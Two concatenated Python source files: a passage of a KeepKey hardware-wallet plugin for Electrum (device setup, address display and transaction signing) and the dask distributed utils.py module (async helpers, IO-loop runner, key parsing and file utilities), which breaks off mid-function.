def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
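# Illustrative note (example values are assumed, not taken from this file):
# sign_message and show_address build device paths by appending the change
# branch and address index to the keystore derivation, so with
# derivation == "m/44'/0'/0'", change == 0 and index == 5 the device is asked
# for "m/44'/0'/0'/0/5" via client.expand_path(...).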
|
utils.py
|
from __future__ import annotations
import asyncio
import contextvars
import functools
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from typing import TYPE_CHECKING
from typing import Any as AnyType
from typing import ClassVar, Container, Sequence, overload
import click
import tblib.pickling_support
if TYPE_CHECKING:
from typing_extensions import Protocol
try:
import resource
except ImportError:
resource = None # type: ignore
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
from dask.utils import parse_timedelta as _parse_timedelta
from dask.widgets import get_template
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
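# Illustrative check (the decorator below is hypothetical, not part of this
# module): because has_arg follows ``__wrapped__``, it sees through
# functools.wraps-style decorators:
#
#     def deco(fn):
#         @functools.wraps(fn)
#         def wrapper(*args, **kwargs):
#             return fn(*args, **kwargs)
#         return wrapper
#
#     @deco
#     def g(x, y):
#         return x + y
#
#     assert has_arg(g, "y")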
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except OSError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does not have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError(f"interface {ifname!r} doesn't have an IPv4 address")
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
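# Hedged usage sketch (coro_a / coro_b are placeholder coroutines): inside a
# coroutine, All() waits for every task and returns the results in input order,
# while Any() returns as soon as the first task finishes, with only that slot
# of the result list filled in:
#
#     async def main():
#         a, b = await All([coro_a(), coro_b()])
#         partial = await Any([coro_a(), coro_b()])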
class NoOpAwaitable:
"""An awaitable object that always returns None.
Useful to return from a method that can be called in both asynchronous and
synchronous contexts"""
def __await__(self):
async def f():
return None
return f().__await__()
class SyncMethodMixin:
"""
A mixin for adding an `asynchronous` attribute and `sync` method to a class.
Subclasses must define a `loop` attribute for an associated
`tornado.IOLoop`, and may also add a `_asynchronous` attribute indicating
whether the class should default to asynchronous behavior.
"""
@property
def asynchronous(self):
"""Are we running in the event loop?"""
return in_async_call(self.loop, default=getattr(self, "_asynchronous", False))
def sync(self, func, *args, asynchronous=None, callback_timeout=None, **kwargs):
"""Call `func` with `args` synchronously or asynchronously depending on
the calling context"""
callback_timeout = _parse_timedelta(callback_timeout)
if asynchronous is None:
asynchronous = self.asynchronous
if asynchronous:
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
return future
else:
return sync(
self.loop, func, *args, callback_timeout=callback_timeout, **kwargs
)
def in_async_call(loop, default=False):
"""Whether this call is currently within an async call"""
try:
return loop.asyncio_loop is asyncio.get_running_loop()
except RuntimeError:
# No *running* loop in thread. If the event loop isn't running, it
# _could_ be started later in this thread though. Return the default.
if not loop.asyncio_loop.is_running():
return default
return False
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = _parse_timedelta(callback_timeout, "s")
if loop.asyncio_loop.is_closed():
raise RuntimeError("IOLoop is closed")
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception:
error[0] = sys.exc_info()
finally:
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError(f"timed out after {callback_timeout} s.")
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops: ClassVar[
weakref.WeakKeyDictionary[IOLoop, tuple[int, LoopRunner | None]]
] = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
if loop is None:
if asynchronous:
self._loop = IOLoop.current()
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
# run loop forever if it's not running already
try:
if not loop.asyncio_loop.is_running():
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if start_exc[0] is not None and not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError(
f"not an exception: {start_exc[0]!r}",
)
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
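# Hedged usage sketch (illustrative): LoopRunner starts a Tornado IOLoop in a
# daemon thread so that synchronous code can drive coroutines through sync()
# or run_sync():
#
#     runner = LoopRunner()
#
#     async def add(a, b):
#         return a + b
#
#     assert runner.run_sync(add, 1, 2) == 3  # starts the loop, runs, stops it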
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x) -> str:
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return "Other"
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('') # Maps as localhost for binding e.g. 'tcp://:8811'
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
if not hostname:
hostname = "localhost"
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError(f"Unexpected key type {typ} (value: {k!r})")
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
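# Illustrative behaviour (sketch, not part of the original module): istask() is
# dask's predicate for a task tuple whose first element is callable, so any
# container that nests one counts as "complex" here.
#
#     _maybe_complex((sum, [1, 2]))         # True  - a task tuple itself
#     _maybe_complex([1, (sum, [1, 2])])    # True  - task nested inside a list
#     _maybe_complex([1, 2, 3])             # False - plain data only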
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
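# Illustrative usage (sketch with assumed data, not part of the original module):
# position a file object just past the next newline so a block read starts on a
# record boundary.
#
#     from io import BytesIO
#     f = BytesIO(b"Alice, 100\nBob, 200\n")
#     f.seek(3)                              # somewhere inside the first record
#     seek_delimiter(f, b"\n", blocksize=16)
#     f.tell()                               # 11, the first byte after b"\n"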
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handle
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
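# Illustrative behaviour (sketch, not part of the original module): buffer-protocol
# objects report their size via .nbytes, while plain bytes fall back to len().
#
#     nbytes(b"abc")                         # 3
#     nbytes(memoryview(bytearray(10)))      # 10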
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
